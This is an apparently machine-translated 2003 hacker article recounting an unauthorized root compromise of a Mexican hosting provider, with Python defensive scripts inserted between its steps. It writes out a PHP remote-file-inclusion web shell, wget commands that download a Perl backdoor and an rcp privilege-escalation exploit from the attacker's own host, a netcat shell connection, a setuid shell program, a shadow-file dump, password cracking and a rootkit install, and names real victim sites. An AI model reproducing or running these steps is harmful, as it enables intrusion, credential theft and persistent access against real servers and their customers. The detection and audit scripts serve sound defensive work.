This page has been robot translated, sorry for typos if any. Original content here.

Root on a hosting provider


Intro.
I decided to describe this particular hack because it happened quite a while ago (although at this moment, January 23, 2003, the server is still in DHG's hands, so to speak), and I was also asked to describe some interesting hack.
I don't want this story to become a guide for other people's misdeeds, so some mistakes/inaccuracies are made on purpose (which, however, any advanced user will notice). Nor will I chew over elementary things such as Linux commands, or where to look for exploits and how to compile them. So let's go.

Round #1: remote.
Originally the target was the Mexican Linux portal www.***.com, which was at one time hosted by this provider.
First it was necessary to find out which OS the portal ran on, although obviously a site about Linux could not be sitting on Windows. The HTTP Server header said: "Apache/1.3.26 (Unix) (Red Hat/Linux) Chili!Soft-ASP/3.6.2 PHP/4.1.2", and the ftp banner read:
managedhosting FTP server (Version 6.5/OpenBSD, linux port 0.3.2) ready.
We did not start scanning ports, cgi bugs and similar nonsense; more precisely, I decided to leave that for later. I also did not want to draw attention to myself in any way. So, the word "hosting" flashed in the ftp banner! Without bothering with RIPE, we went straight for the IP address that www.***.com resolved to. It led me to the host "managedhosting.dialtoneinternet.com.mx", which was obviously its hoster. A short manual brute force later turned up the hoster's real site: dialtoneinternet.com.mx (www.dialtone.com).
At that point we decided to stop for the time being and return to the site being broken. It ran the phpWebSite PHP engine, version unknown. This latest php-nuke clone did not stand out for any special attention to security: all versions of phpWebSite up to 0.8.2 (even those marked as Stable) had a vulnerability of the 'PHP source injection' class, what would now be called remote file inclusion. For those to whom this means nothing, see r4ShRaY's article on the vulnerability; everyone else, read on. So, here is a slice of the modsecurity.php source:

<?php
global $inc_prefix;
// with register_globals on, ?inc_prefix=... in the URL sets this variable
if (!$inc_prefix) {
...
}
...
// no check that $inc_prefix is local: a URL here makes PHP fetch and run remote code
include_once($inc_prefix . "htmlheader.php");
?>

IMHO, everything here should be clear to everyone. By calling the script like this:
http://www.***.com/modsecurity.php?inc_prefix=http://www.dhgroup.org
the file htmlheader.php located on our site gets executed with rights as yet unknown. The only thing that worried me was that the attacked site might have a patched or newer version (after all, this was not some 'Vasya's home page' but a portal for kewl Linux userz).
So we created the file htmlheader.php on our site with this content:

<?php passthru($cmd); /* $cmd arrives from the query string the same way, via register_globals */ ?>

Then I went to the address:
modsecurity.php?inc_prefix=http://www.dhgroup.org&cmd=ls
and in response got a listing of the www directory. # Note: from here on I will write all commands without the "...?inc_prefix=http://..." prefix!
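What the hoster's own access log would have shown for the requests above, as an added example that is not part of the original write-up: a small Python detector that parses Apache combined-format lines, percent-decodes every query parameter repeatedly, and flags any value that starts with a URL scheme or PHP stream wrapper. The log lines are constructed for the example; only the parameter name inc_prefix and the dhgroup.org host come from the page, everything else is assumed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (not from the page's server).
# The first two mirror the include trick described above, the second with the
# scheme double percent-encoded; the third is an ordinary request.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jan/2003:10:01:02 +0000] "GET /modsecurity.php?inc_prefix=http://www.dhgroup.org&cmd=ls HTTP/1.0" 200 512 "-" "Mozilla/4.7"
203.0.113.5 - - [23/Jan/2003:10:01:09 +0000] "GET /modsecurity.php?inc_prefix=%2566%2574%2570%253a%252f%252fevil.example%252f HTTP/1.0" 200 512 "-" "Mozilla/4.7"
198.51.100.9 - - [23/Jan/2003:10:02:00 +0000] "GET /index.php?module=news HTTP/1.0" 200 4096 "-" "Lynx/2.8"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Schemes that PHP's include() will fetch or wrap when allow_url_fopen is on.
SCHEME_RE = re.compile(r'^\s*(?:https?|ftp|php|data)://', re.IGNORECASE)
MAX_DECODE = 3   # bound on repeated decoding; enough for %25-style double encoding


def decode_param(value):
    """Percent-decode repeatedly (bounded) so double encoding cannot hide a scheme."""
    for _ in range(MAX_DECODE):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def find_rfi(line):
    """Return a finding dict for one log line, or None if nothing looks like RFI."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group('target'))
    hits = [(name, decode_param(value))
            for name, value in parse_qsl(target.query, keep_blank_values=True)
            if SCHEME_RE.match(decode_param(value))]
    if not hits:
        return None
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'path': target.path,
            'status': int(m.group('status')), 'params': hits}


def scan(log_text):
    """Run find_rfi over every line and keep the hits."""
    return [hit for hit in map(find_rfi, log_text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A status of 200 on a flagged line is the detail to act on: the include succeeded and whatever the remote file contained has already run as the web server user.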

Round #2: local.
> echo hi > kewl.txt; cat kewl.txt
The browser answered these two commands with an empty snow-white screen, which meant I had no write permission in the www directory, so it was too early to talk about a deface. Before taking any further steps it was necessary to gather more information about the system. First of all we went for the httpd.conf file:
> cat /etc/httpd/conf/httpd.conf
From it we pulled the FrontPage extensions version (by the way, the 'Server' header said nothing about FrontPage being installed) and the paths to the www directories of the hosted sites: dialtoneinternet.com.mx (the hosting provider itself), stormarketing.com, altavistablinds.com, parigitown.com, plus a few large resources:
# -FrontPage- version=4.0
##
## httpd.conf - Apache HTTP server configuration file
##
...
<VirtualHost 66.33.62.88>
<Directory /home/admin/www/serversecure>
Options all
AllowOverride All
</Directory>
ServerName dialtoneinternet.com.mx
ServerAlias www.dialtoneinternet.com.mx
DocumentRoot /home/admin/www
ErrorLog logs/error_log
TransferLog logs/transfer_log
Group nobody
ScriptAlias /cgi-bin/ /home/admin/www/cgi-bin/
</VirtualHost>
...
Of course, those rights were not enough to deface them, BUT they were quite enough to read those sites' FrontPage service.pwd files (_vti_pvt/service.pwd, where present), with all the consequences that follow ;) We kept this option in reserve for the case where I could not raise privileges by any other means.
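An added example, not from the original article, showing how a defender reviewing a config like the one above would audit it: a Python script that pulls every VirtualHost out of httpd.conf, flags "Options all" and "AllowOverride All", and lists the DocumentRoots that any script running under the shared server identity can read, which is exactly why one vulnerable site could read the other sites' service.pwd. The config excerpt is constructed: the first vhost copies the page's directives, the second (other.example) is invented so the audit has something to pass. The assumption about Apache 1.3 identity handling is stated in the comments.

```python
import re

# Constructed httpd.conf excerpt modelled on the fragment quoted above. The
# first vhost repeats the page's directives; the second is invented with
# tighter settings.
SAMPLE_CONF = """\
User nobody
Group nobody
<VirtualHost 66.33.62.88>
<Directory /home/admin/www/serversecure>
Options all
AllowOverride All
</Directory>
ServerName dialtoneinternet.com.mx
ServerAlias www.dialtoneinternet.com.mx
DocumentRoot /home/admin/www
Group nobody
ScriptAlias /cgi-bin/ /home/admin/www/cgi-bin/
</VirtualHost>
<VirtualHost 66.33.62.89>
<Directory /home/other/www>
Options -Indexes -Includes -ExecCGI
AllowOverride None
</Directory>
ServerName other.example
DocumentRoot /home/other/www
</VirtualHost>
"""

VHOST_RE = re.compile(r'<VirtualHost\s+([^>]+)>(.*?)</VirtualHost>', re.S | re.I)
DIR_RE = re.compile(r'<Directory\s+([^>]+)>(.*?)</Directory>', re.S | re.I)


def directive(block, name):
    """First value of a directive in a config block, or None."""
    m = re.search(r'^\s*' + re.escape(name) + r'\s+(.+?)\s*$', block, re.M | re.I)
    return m.group(1) if m else None


def audit_vhost(addr, body):
    """Flag directory settings that widen what a script in this vhost can do."""
    findings = []
    for path, dbody in DIR_RE.findall(body):
        opts = (directive(dbody, 'Options') or '').lower().split()
        if 'all' in opts or '+all' in opts:
            findings.append(f'{path}: Options all (Indexes, Includes, ExecCGI, FollowSymLinks)')
        if (directive(dbody, 'AllowOverride') or '').lower() == 'all':
            findings.append(f'{path}: AllowOverride All (a writable .htaccess can redefine handlers)')
    return {'addr': addr.strip(), 'server_name': directive(body, 'ServerName'),
            'docroot': directive(body, 'DocumentRoot'), 'findings': findings}


def audit(conf_text):
    """Audit every VirtualHost and record the identity their in-process scripts share."""
    vhosts = [audit_vhost(addr, body) for addr, body in VHOST_RE.findall(conf_text)]
    # Assumption about the platform on this page: Apache 1.3 honours a per-vhost
    # User/Group only for suexec'd CGI, so mod_php code in every vhost runs as the
    # server-wide User/Group and can read every DocumentRoot that user can read.
    outside = VHOST_RE.sub('', conf_text)
    identity = (directive(outside, 'User'), directive(outside, 'Group'))
    docroots = [v['docroot'] for v in vhosts if v['docroot']]
    return {'vhosts': vhosts, 'identity': identity,
            'cross_readable': docroots if len(docroots) > 1 else []}


if __name__ == '__main__':
    report = audit(SAMPLE_CONF)
    print('server identity:', report['identity'])
    for v in report['vhosts']:
        print(v['server_name'], v['docroot'], v['findings'] or 'ok')
    print('readable from any vhost script:', report['cross_readable'])
```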
Then, out of curiosity, we entered:
> netstat -a
Here is what I got (# marks my comments):
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      1 66.33.62.*:2114         by.ru:www               LAST_ACK     # (1)
tcp        0      0 66.33.62.*:www          62.141.75.226{116       ESTABLISHED
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 *:imap2                 *:*                     LISTEN
tcp        0      0 *:pop3                  *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:81                    *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN       # (2)
tcp        0      0 managedhosting.d:domain *:*                     LISTEN
tcp        0      0 managedhosting2.:domain *:*                     LISTEN
tcp        0      0 spacebattles.net:domain *:*                     LISTEN
tcp        0      0 66.33.62.*:domain       *:*                     LISTEN
tcp        0      0 localhost.locald:domain *:*                     LISTEN
tcp        0      0 *:smtp                  *:*                     LISTEN
tcp        0      0 *:mysql                 *:*                     LISTEN
tcp        0      0 *:casp3001              *:*                     LISTEN
tcp        0      0 *:casp3000              *:*                     LISTEN
tcp        0      0 *:casp5105              *:*                     LISTEN
tcp        0      0 *:casp5103              *:*                     LISTEN
tcp        0      0 *:casp5104              *:*                     LISTEN
tcp        0      0 *:1581                  *:*                     LISTEN
tcp        0      0 *:1024                  *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN       # (3)
udp        0      0 *:4320                  *:*
udp        0      0 managedhosting.d:domain *:*
udp        0      0 managedhosting2.:domain *:*
udp        0      0 spacebattles.net:domain *:*
udp        0      0 66.33.62.*:domain       *:*
udp        0      0 localhost.locald:domain *:*
raw        0      0 *:udp                   *:*                     7
raw        0      0 *:tcp                   *:*                     7
raw        0      0 *:icmp                  *:*                     7
raw        0      0 *:tcp                   *:*                     7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ACC ]     STREAM     LISTENING     552166 /home/httpsd/cache/ssl.socket
unix  0      [ ACC ]     STREAM     LISTENING     2087   /tmp/mysql.sock
unix  4      [ ]         DGRAM                    290    /dev/log
unix  0      [ ACC ]     STREAM     LISTENING     549144 /var/run/ndc
unix  0      [ ]         STREAM                   565939
unix  0      [ ]         DGRAM                    555692
unix  0      [ ]         DGRAM                    549142
unix  0      [ ]         DGRAM                    3193
unix  0      [ ]         DGRAM                    303
(1) - that's us =)
(2) - the presence of SSL usually means private information (credit cards, for example) is exchanged with the server. Although for a hoster this is routine.
(3) - there it is! It will come in handy later.
So there was no need to scan ports either :)
Next it was time for concrete action, or rather to find out at least the approximate Red Hat release and dance from there. So, for those who don't know, some (if not all) Linux distributions leave a "*-release" file (where * is the distribution name: mandrake-release, cobalt-release ...) in /etc, and admins never get around to removing it.
> cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
Whoa, I must say we did not expect this :) Everything else was a matter of technique... To get the long-awaited root we decided to use the Red Hat rcp vulnerability.

Red Hat 6.2: rcp possible root hole
Actually the vulnerability was found in Red Hat 6.2; about 6.1 the post by Andrew Griffiths and tlabs said not a word. Hoping for luck, we entered:
> ls -alF `which rcp`
-rwsr-xr-x 1 root root 14868 Jul 30 1999 /usr/bin/rcp*
Oops! A setuid rcp is indeed present. That's already good :) I downloaded "rcpsploit.pl" from tlabs and, having studied the source, paused. I'll explain how this sploit works; perhaps it will help you understand the essence of the vulnerability and of the problem that came up.
So, it creates 2 files:
/tmp/shell.c ---------------------

#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    /* these succeed only because the binary runs with effective uid 0 (it has
       been made setuid root); they make the real ids 0 as well before exec */
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}


hey ------------------------------
Sploit written by tlabs, thanks to Andrew Griffiths for the bug report

Then, through the setuid rcp, the sploit compiles shell.c and chmods the result in the same way. That's it! We run the compiled shell and get a shell with uid=0, gid=0. But what use is this shell if we execute commands through a web server? :-/
This sploit could only be made to work from a "normal" shell.
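The check the author did by hand with ls -alF, as an added Python example (not code from the page or from tlabs) generalised to the whole filesystem: classify every setuid file against a baseline of expected setuid-root programs and report the rest, which is how a defender would have spotted an unneeded setuid rcp before someone else did. The baseline paths and the skip list are assumptions for the example; build the real baseline from a clean install of the same release.

```python
import os
import stat

# Baseline of setuid-root programs expected on the host. These paths are an
# assumption for this example; derive the real list from a clean install of
# the same release and keep it under change control.
EXPECTED_SETUID_ROOT = frozenset({
    '/bin/su', '/bin/ping', '/bin/mount', '/bin/umount', '/usr/bin/passwd',
})
SKIP_PREFIXES = ('/proc', '/sys', '/dev')   # pseudo-filesystems, nothing to audit


def classify(path, mode, uid, expected=EXPECTED_SETUID_ROOT):
    """Verdict for one entry given its lstat() mode and owner; None if it is not a setuid file."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None                     # symlinks, directories and plain files
    if uid != 0:
        return 'setuid to non-root uid %d' % uid
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return 'setuid-root binary is group/world writable'
    if path not in expected:
        return 'setuid-root binary not in baseline'
    return 'expected'


def find_setuid(root='/', expected=EXPECTED_SETUID_ROOT):
    """Walk the tree; return (path, mode, verdict) for every setuid file outside the baseline."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)     # lstat: never follow a symlink into a setuid target
            except OSError:
                continue
            verdict = classify(path, st.st_mode, st.st_uid, expected)
            if verdict and verdict != 'expected':
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), verdict))
    return findings


if __name__ == '__main__':
    for path, mode, verdict in find_setuid():
        print(mode, path, verdict)
```

On the host in this story the walk would have returned /usr/bin/rcp with mode 0o4755 and the verdict "not in baseline"; the fix is chmod u-s (or removing the rsh client package), not a better baseline.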
Well, need a shell? You'll have one! A small Perl backdoor had long been gathering dust in my warez archive, and we decided to use it:
> wget -O /tmp/.tmp.pl http://www.dhgroup.org/exp/backhole.pl
> chmod 755 /tmp/.tmp.pl
> perl /tmp/.tmp.pl
Next, on your own machine:
> nc ***.com 51015
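A detection-side counterpart to the netstat listing earlier on this page and to the backdoor just started, added here as an example that is not from the original: a Python parser for netstat -a output that keeps only sockets accepting input (TCP in LISTEN, any UDP socket) and diffs two snapshots, so the new listener on port 51015 stands out from the noise of legitimate services. Both snapshots are constructed; BEFORE is cut down from the page's listing with a documentation address substituted for the garbled peer, and AFTER adds the backdoor's port.

```python
import re

# Constructed netstat -a snapshots. BEFORE is a cut-down copy of the listing
# shown earlier on this page (peer address replaced with a documentation
# address); AFTER adds the port the Perl backdoor listens on.
BEFORE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      1 66.33.62.*:2114         by.ru:www               LAST_ACK
tcp        0      0 66.33.62.*:www          203.0.113.7:1116        ESTABLISHED
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:mysql                 *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
udp        0      0 *:4320                  *:*
raw        0      0 *:icmp                  *:*                     7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ACC ]     STREAM     LISTENING     2087   /tmp/mysql.sock
"""
AFTER = BEFORE + "tcp        0      0 *:51015                 *:*                     LISTEN\n"

# proto, recv-q, send-q, local, foreign, optional state (UDP lines have none)
SOCK_RE = re.compile(r'^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$')


def listeners(netstat_text):
    """Set of (proto, local host, local port) for sockets that accept input."""
    found = set()
    for line in netstat_text.splitlines():
        m = SOCK_RE.match(line)
        if not m:
            continue                    # headers, raw sockets, unix sockets
        proto, local, _remote, state = m.groups()
        if proto.startswith('tcp') and state != 'LISTEN':
            continue                    # established/closing connections are not listeners
        host, _, port = local.rpartition(':')
        found.add((proto, host, port))
    return found


def new_listeners(before, after):
    """Listeners present in the later snapshot but absent from the baseline."""
    return sorted(listeners(after) - listeners(before))


if __name__ == '__main__':
    for proto, host, port in new_listeners(BEFORE, AFTER):
        print('new listener:', proto, host, port)
```

Taking the baseline from a known-good state matters more than the parser: on a busy shared host a high-numbered listener owned by the web server user (netstat -p would show it) is the tell, and it is only visible as "new" if an earlier snapshot exists.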
Then:
> cd /tmp
> wget -c http://www.dhgroup.org/exp/rcpsploit.pl
> chmod 755 rcpsploit.pl; perl rcpsploit.pl
Ok, too easy, we'll just launch a shell, lets hope shit went well innit :)
> id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
That's all :) And the last thing:
> cat /etc/shadow
root:###:11961:0:99999:7:-1:-1:134549964
bin:*:10925:0:99999:7:::
daemon:*:10925:0:99999:7:::
adm:###:11577:0:99999:7:-1:-1:134549852
... etc ...
JtR loaded 977 password hashes %) To narrow the search we entered:
john -i:all -u:root shadow
About 8 hours later ... the long-awaited moment:




Then I uploaded an lrk (Linux rootkit) there, a few datapipes and a bnc too ... but that is a completely different story ....
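Triage of a shadow dump like the one above, as an added Python example that is not from the original write-up: it classifies each account's hash scheme, computes the password age from the days-since-epoch field, and lists the accounts worth feeding to john weakest scheme first. Traditional 13-character DES-crypt hashes cap passwords at 8 characters and use a 12-bit salt, which is why an incremental run like the one above finishes in hours rather than years. The sample lines are constructed with made-up hashes; only the field layout and the epoch values are taken from the page.

```python
# Constructed /etc/shadow lines shaped like the redacted dump above. The hash
# strings are made up: a 13-character DES-crypt hash for root, an MD5-crypt
# ($1$) hash for adm, locked accounts, and one account with an empty field.
SAMPLE_SHADOW = """\
root:ab01Fax5Q2r0k:11961:0:99999:7:-1:-1:134549964
bin:*:10925:0:99999:7:::
daemon:*:10925:0:99999:7:::
adm:$1$saltsalt$abcdefghijklmnopqrstu.:11577:0:99999:7:-1:-1:134549852
guest:!!:11900:0:99999:7:::
kiosk::11900:0:99999:7:::
"""

SCHEMES = {'$1$': 'md5-crypt', '$2a$': 'bcrypt', '$2b$': 'bcrypt', '$2y$': 'bcrypt',
           '$5$': 'sha256-crypt', '$6$': 'sha512-crypt', '$y$': 'yescrypt'}
# Attack cost, cheapest first: an empty field is a login without a password.
CRACKABLE_ORDER = ['empty', 'des-crypt', 'unknown', 'md5-crypt',
                   'sha256-crypt', 'sha512-crypt', 'bcrypt', 'yescrypt']


def hash_scheme(h):
    """Name the hash scheme of one shadow password field."""
    if h == '':
        return 'empty'
    if h[0] in '*!':
        return 'locked'
    for prefix, name in SCHEMES.items():
        if h.startswith(prefix):
            return name
    if len(h) == 13:
        return 'des-crypt'      # 2-char salt + 11 chars; 8-character password limit
    return 'unknown'


def triage(shadow_text, today):
    """Parse shadow lines; today is the current day count since the epoch (as in field 3)."""
    rows = []
    for line in shadow_text.splitlines():
        fields = line.split(':')
        if len(fields) < 8:
            continue                     # blank or malformed line
        user, pw, lastchg = fields[0], fields[1], fields[2]
        age = today - int(lastchg) if lastchg else None
        rows.append({'user': user, 'scheme': hash_scheme(pw), 'age_days': age})
    return rows


def crack_targets(rows):
    """Accounts whose password can be attacked or bypassed, weakest scheme first."""
    order = {s: i for i, s in enumerate(CRACKABLE_ORDER)}
    targets = [r for r in rows if r['scheme'] in order]
    return [r['user'] for r in sorted(targets, key=lambda r: (order[r['scheme']], r['user']))]


if __name__ == '__main__':
    import time
    rows = triage(SAMPLE_SHADOW, today=int(time.time() // 86400))
    for r in rows:
        print(r)
    print('attack order:', crack_targets(rows))
```

The same list read from the defender's side is the remediation order: close the empty-password account first, then force a change on every DES-crypt account while moving the system to a salted iterated scheme, and only then worry about the MD5-crypt ones.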

What was used during hacking:
Netscape v.x
secureCRT 3.1
Netcat
John the ripper
backhole.pl
rcpsploit.pl
Brain
PacketStormSecurity

Conclusions \ remarks \ comments:
1. If a server proudly calls itself a hosting provider or a Linux portal, that does not mean it is well protected.
2. While hacking, you should not advertise your IP (that will be a separate article in future).
3. During the hack, so-called "hacker" software was almost never used.
4. RH 6.* does not cut it :)

PS IMHO the reader may get the impression that I simply got lucky and the whole hack took a couple of minutes. That is not so. There were moments when my hands simply dropped and I wanted to bang my head against the wall.

Posted by: D4rkGr3y


Material published with permission of DHGROUP (http://www.dhgroup.org)